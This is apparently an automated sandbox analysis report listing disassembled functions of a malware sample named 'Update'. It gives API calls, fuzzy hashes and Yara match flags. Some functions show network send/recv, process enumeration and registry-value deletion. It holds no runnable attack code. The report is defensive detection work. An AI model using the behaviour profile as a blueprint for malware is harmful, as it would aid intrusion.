                                                                                            • Opcode ID: c6415059b5956f7703cd403ceb6133ec0c7a387c898442496587f65e28799cb1
                                                                                            • Instruction ID: 4e8061daf00ff1eac5031093c4a15ac376f57eade3aeb5ea530a217b464a537a
                                                                                            • Opcode Fuzzy Hash: c6415059b5956f7703cd403ceb6133ec0c7a387c898442496587f65e28799cb1
                                                                                            • Instruction Fuzzy Hash: 2A016139A017529FD720EB6A9404B5FB3A0BF04724F0C400BEA14AF3A4CF345546DBD9
                                                                                            Function 034E9BA0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(?), ref: 034E9BD2
                                                                                            • EnterCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9BE3
                                                                                            • EnterCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9BF8
                                                                                            • GdiplusShutdown.GDIPLUS(00000000,?,?,?,034E9B7B), ref: 034E9C04
                                                                                            • LeaveCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9C15
                                                                                            • LeaveCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9C1C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                            • String ID:
                                                                                            • API String ID: 4268643673-0
                                                                                            • Opcode ID: 04bf901989f9fa4772e06a8bcd670040df8298f17b23ad76a16306c8b499e44e
                                                                                            • Instruction ID: 69667a63420a284da298d17439bd9462411e6690ab665527d0bdc45b19dc4c17
                                                                                            • Opcode Fuzzy Hash: 04bf901989f9fa4772e06a8bcd670040df8298f17b23ad76a16306c8b499e44e
                                                                                            • Instruction Fuzzy Hash: 5C0112B1900305EFC714FF66A994815BBA4FB49219324856EE118CA2A6C377C407DF94
                                                                                            Function 034E48D0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E48E1
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E48EC
                                                                                            • Sleep.KERNEL32(00000258), ref: 034E48F9
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E4914
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E491D
                                                                                            • Sleep.KERNEL32(0000012C), ref: 034E492E
                                                                                              • Part of subcall function 034E3F60: GetCurrentThreadId.KERNEL32 ref: 034E3F65
                                                                                              • Part of subcall function 034E3F60: send.WS2_32(?,035049C0,00000010,00000000), ref: 034E3FC6
                                                                                              • Part of subcall function 034E3F60: SetEvent.KERNEL32(?), ref: 034E3FE9
                                                                                              • Part of subcall function 034E3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 034E3FF5
                                                                                              • Part of subcall function 034E3F60: WSACloseEvent.WS2_32(?), ref: 034E4003
                                                                                              • Part of subcall function 034E3F60: shutdown.WS2_32(?,00000001), ref: 034E401B
                                                                                              • Part of subcall function 034E3F60: closesocket.WS2_32(?), ref: 034E4025
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 1019945655-0
                                                                                            • Opcode ID: 31d6292f814c0e31e6d340cf304f2be826e57a3b8993f3a962d64f90d82a46b5
                                                                                            • Instruction ID: d70eec7c9ab1f788b50f7e077478f793d7fb77ddcd461e4f21440b9d9c5d691e
                                                                                            • Opcode Fuzzy Hash: 31d6292f814c0e31e6d340cf304f2be826e57a3b8993f3a962d64f90d82a46b5
                                                                                            • Instruction Fuzzy Hash: 80F090362046055BC220FBAADC84C4BF3E9EFC8720B244B09E265873D4CA71E806CBA4
                                                                                            Function 034E3300 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E3311
                                                                                            • Sleep.KERNEL32(00000258), ref: 034E331E
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 034E3326
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E3332
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E333A
                                                                                            • Sleep.KERNEL32(0000012C), ref: 034E334B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 3137405945-0
                                                                                            • Opcode ID: 9a6d800252488c4db140617562de5740f46c41dd00b1d2d844987f4ef8592810
                                                                                            • Instruction ID: 4f09854cf10588e62c2248002966a9220a650541d795128f3fb878870baacbbd
                                                                                            • Opcode Fuzzy Hash: 9a6d800252488c4db140617562de5740f46c41dd00b1d2d844987f4ef8592810
                                                                                            • Instruction Fuzzy Hash: CFF082722043056BD610ABA9DC84D46F3E8AF99334F204B09F221832E4CAB1E806DB60
                                                                                            Function 00021D6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00021D85
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00021D92
                                                                                            • _CxxThrowException.VCRUNTIME140(?,000227B4), ref: 00021E99
                                                                                            • _CxxThrowException.VCRUNTIME140(?,00022808), ref: 00021EB6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionThrow$_callnewhmalloc
                                                                                            • String ID: Unknown exception
                                                                                            • API String ID: 4113974480-410509341
                                                                                            • Opcode ID: 7216ff27f89032d51d37947722a498acd5c1f3340bbac43742d36af2aa278916
                                                                                            • Instruction ID: 34ea3eba9eef833c5ccff8e1da481786c30d4933ec5c305fe325c2b5421cf819
                                                                                            • Opcode Fuzzy Hash: 7216ff27f89032d51d37947722a498acd5c1f3340bbac43742d36af2aa278916
                                                                                            • Instruction Fuzzy Hash: 5CF0AF3490422DB6CF54BAE8FD069ED77AC5B30350BA08575F92896093EB71EA5AC5C0
                                                                                            Function 0350095B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBCMT ref: 0350096E
                                                                                              • Part of subcall function 035008C9: ___BuildCatchObjectHelper.LIBCMT ref: 035008FF
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 03500985
                                                                                            • ___FrameUnwindToState.LIBCMT ref: 03500993
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 2163707966-3733052814
                                                                                            • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                            • Instruction ID: c00cbac5be0a93a90650f41ff8aabda4d2bd7cb779431a50a3f2b98a33a4ce2f
                                                                                            • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                            • Instruction Fuzzy Hash: DF01123500120ABFEF12AF51DC44EAABA7AFF48350F048414BD481A1B0D73299A1DBA0
                                                                                            Function 6C39260F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F1BBC535,?,?,00000000,6C3AC7DD,000000FF,?,6C3926D0,6C3925AA,?,6C39276C,00000000), ref: 6C392644
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C392656
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,6C3AC7DD,000000FF,?,6C3926D0,6C3925AA,?,6C39276C,00000000), ref: 6C392678
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 43510cf1881fe82618e8e1f80f94a9108046cee74d171ee1168fa16308754694
                                                                                            • Instruction ID: 67f17fe649bfdb05ffd6c418e1733173c33ce7624a28ee103b28b23745686e91
                                                                                            • Opcode Fuzzy Hash: 43510cf1881fe82618e8e1f80f94a9108046cee74d171ee1168fa16308754694
                                                                                            • Instruction Fuzzy Hash: 76013B31A14A59AFDF019F54CD09FAE7BBCFB15715F000925F821E2A90DB769904CE94
                                                                                            Function 6C3A0B20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PeekConsoleInputA.KERNEL32(?,gfff,6C3B9D70,00000000,?,6C393746,00000000,0000000C,6C3B9D70,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0B35
                                                                                            • GetLastError.KERNEL32(?,6C393746,00000000,0000000C,6C3B9D70,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0B41
                                                                                              • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
                                                                                            • ___initconin.LIBCMT ref: 6C3A0B51
                                                                                              • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
                                                                                            • PeekConsoleInputA.KERNEL32(?,?,FFFFFFFF,?,6C393746,00000000,0000000C,6C3B9D70,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0B65
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleInputPeek$CloseCreateErrorFileHandleLast___initconin
                                                                                            • String ID: gfff
                                                                                            • API String ID: 1545762386-1553575800
                                                                                            • Opcode ID: 19b0023bb04df08badad7ab1bfeb10fb9f871e601297209204f86accffbaba16
                                                                                            • Instruction ID: 9bb65a0d057bed5fc47842d2d64fbe9d5e432f3a06f224f9883053da5556f644
                                                                                            • Opcode Fuzzy Hash: 19b0023bb04df08badad7ab1bfeb10fb9f871e601297209204f86accffbaba16
                                                                                            • Instruction Fuzzy Hash: BEF0C936A0015DBBCF122FD9DC049DE3F7AFB5A3A9B044110FA1A96620CB32C8719F95
                                                                                            Function 034EB7E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 034EB800
                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 034EB810
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 034EB81B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteOpenValue
                                                                                            • String ID: Console$IpDatespecial
                                                                                            • API String ID: 849931509-1840232981
                                                                                            • Opcode ID: 6dc2452220382a3fc7a358ab9a3c0b7b884f34dc5643d40cb0dc8752ca5395bd
                                                                                            • Instruction ID: f47dea1331959451ba52b511b1332ce4d5ac93f4a76214bad4564928a4791aef
                                                                                            • Opcode Fuzzy Hash: 6dc2452220382a3fc7a358ab9a3c0b7b884f34dc5643d40cb0dc8752ca5395bd
                                                                                            • Instruction Fuzzy Hash: CFE02632204300AFD320E660BD4FFA97354FB8C305F104D0DFA84A10818153E009DA65
                                                                                            Function 034EB990 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,DF800B7B), ref: 034EB9DA
                                                                                            • _memset.LIBCMT ref: 034EB9FB
                                                                                            • _memset.LIBCMT ref: 034EBA4B
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 034EBA65
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 034EBAB7
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 2416807333-0
                                                                                            • Opcode ID: ab230af0a97490279129c02ab6a526a6897e6d3cf1aaed7695c336d7a2a9b227
                                                                                            • Instruction ID: 752a2ada21eeb452a78bf54a40203b7e33100d0b1f7ef4bfcfbb1eac7a153598
                                                                                            • Opcode Fuzzy Hash: ab230af0a97490279129c02ab6a526a6897e6d3cf1aaed7695c336d7a2a9b227
                                                                                            • Instruction Fuzzy Hash: F3410631904205AFDB20DF60CC45FABB7B8FF04715F04469AE9159F2C0E7759A85CB99
                                                                                            Function 6C374CA0 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C374CD5
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C374CEF
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C374D10
                                                                                            • __Getctype.LIBCPMT ref: 6C374DC4
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C374DF7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                            • String ID:
                                                                                            • API String ID: 3087743877-0
                                                                                            • Opcode ID: 8462968a0808042533ef2764203be9dd2016c5ca46cc45d199590f22395ed8d8
                                                                                            • Instruction ID: caaa69a3ecf948ad76f39d5026d761ac2fb6669b08676febb5b92fc102656c0f
                                                                                            • Opcode Fuzzy Hash: 8462968a0808042533ef2764203be9dd2016c5ca46cc45d199590f22395ed8d8
                                                                                            • Instruction Fuzzy Hash: BB416871E002148FCB20DF98C855BAEB7B4FF58718F044119D899ABB81E739A904CFA6
                                                                                            Function 034E3CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • recv.WS2_32(?,?,00000598,00000000), ref: 034E3CBF
                                                                                            • SetLastError.KERNEL32(00000000,?,?,034E399F,?,?,00000000,000000FF,00000000), ref: 034E3CFA
                                                                                            • GetLastError.KERNEL32(00000000), ref: 034E3D45
                                                                                            • WSAGetLastError.WS2_32(?,?,034E399F,?,?,00000000,000000FF,00000000), ref: 034E3D7B
                                                                                            • WSASetLastError.WS2_32(0000000D,?,?,034E399F,?,?,00000000,000000FF,00000000), ref: 034E3DA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$recv
                                                                                            • String ID:
                                                                                            • API String ID: 316788870-0
                                                                                            • Opcode ID: d81e5fda064823cfc1cb5968aec99ffd516a123a79f8027b9ea220dd056f1a56
                                                                                            • Instruction ID: b63b8bb5ec6e5d8d66f2399373534cff5579c9caafb8b55cedc54c18edd809c8
                                                                                            • Opcode Fuzzy Hash: d81e5fda064823cfc1cb5968aec99ffd516a123a79f8027b9ea220dd056f1a56
                                                                                            • Instruction Fuzzy Hash: 6C31267A6042108FEB25DFA8D4C8F6A77A9FB84326F0405ABED05CF389C731D8418B59
                                                                                            Function 00914037 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0091404B
                                                                                              • Part of subcall function 009113F7: HeapFree.KERNEL32(?,00000000,?,?,?,00914088,?,00000000,00914010,?,10015054,0091361F), ref: 00911414
                                                                                            • HeapDestroy.KERNEL32(?,?,00000000,00914010,?,10015054,0091361F), ref: 00914090
                                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,00914010,?,10015054,0091361F), ref: 009140AB
                                                                                            • SetEvent.KERNEL32(?,?,00000000,00914010,?,10015054,0091361F), ref: 00914127
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0091412E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CriticalSection$CreateDestroyEnterEventFreeLeave
                                                                                            • String ID:
                                                                                            • API String ID: 563679510-0
                                                                                            • Opcode ID: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                                            • Instruction ID: b884c91cc7d2bd268608bb8b552b383a26f029cc3934c20f773ed5c2c31de06d
                                                                                            • Opcode Fuzzy Hash: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                                            • Instruction Fuzzy Hash: DA310270600A06EFD705DB74C888BAAF7A8FF4C311F148659E5298B660CB35E895CBD0
                                                                                            Function 034F0EEB Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 034F0EF9
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            • _free.LIBCMT ref: 034F0F0C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 1020059152-0
                                                                                            • Opcode ID: f10a3e81bcaee892d9d54f1479343612492f7549086195fe017301255bb52164
                                                                                            • Instruction ID: 163d9b3889797a91ed5dd1ba822ed2162136f4965b8e05a44594348a76d5df11
                                                                                            • Opcode Fuzzy Hash: f10a3e81bcaee892d9d54f1479343612492f7549086195fe017301255bb52164
                                                                                            • Instruction Fuzzy Hash: C4115736408715AFCB21BF72E804A1B37499F802A0F1E002BEA498F261DB7184428BBC
                                                                                            Function 034E2C10 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 034E2C3F
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 034E2C55
                                                                                            • TranslateMessage.USER32(?), ref: 034E2C64
                                                                                            • DispatchMessageW.USER32(?), ref: 034E2C6A
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 034E2C78
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                            • String ID:
                                                                                            • API String ID: 2015114452-0
                                                                                            • Opcode ID: 0c61072903bddebe2b6a5f4cf220262610d2893d734d645547c781821ccbc34d
                                                                                            • Instruction ID: 9b4035b168ce22e164944a15e977572b75923a999a8b98f88e60da4f813ebe7e
                                                                                            • Opcode Fuzzy Hash: 0c61072903bddebe2b6a5f4cf220262610d2893d734d645547c781821ccbc34d
                                                                                            • Instruction Fuzzy Hash: 3801DB3265031EB6EA20F6D4DC85FBB736CAB04B11F104D52F710EE1C4D6E2A40687A8
                                                                                            Function 0092367A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __CreateFrameInfo.LIBCMT ref: 009236A2
                                                                                              • Part of subcall function 00923232: __getptd.LIBCMT ref: 00923240
                                                                                              • Part of subcall function 00923232: __getptd.LIBCMT ref: 0092324E
                                                                                            • __getptd.LIBCMT ref: 009236AC
                                                                                              • Part of subcall function 009198E6: __getptd_noexit.LIBCMT ref: 009198E9
                                                                                              • Part of subcall function 009198E6: __amsg_exit.LIBCMT ref: 009198F6
                                                                                            • __getptd.LIBCMT ref: 009236BA
                                                                                            • __getptd.LIBCMT ref: 009236C8
                                                                                            • __getptd.LIBCMT ref: 009236D3
                                                                                              • Part of subcall function 009232D7: __CallSettingFrame@12.LIBCMT ref: 00923323
                                                                                              • Part of subcall function 009237A0: __getptd.LIBCMT ref: 009237AF
                                                                                              • Part of subcall function 009237A0: __getptd.LIBCMT ref: 009237BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 3282538202-0
                                                                                            • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                            • Instruction ID: abbfda4f9bf27a2b338d4df493d5aef3252042e5cb0fd739bee6817ff787036d
                                                                                            • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                            • Instruction Fuzzy Hash: A211B2B5D00209DFDB00EFA4D956BEE7BB0FF48314F1084A9F814AB251EB389A559F50
                                                                                            Function 034E4B70 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 034E4B83
                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 034E4B8D
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 034E4BA0
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 034E4BA3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                            • String ID:
                                                                                            • API String ID: 3168844106-0
                                                                                            • Opcode ID: bbafe3ca27799eb8b97b84fe021bbf5ea03d3257992c1593045a460b8a44ed7d
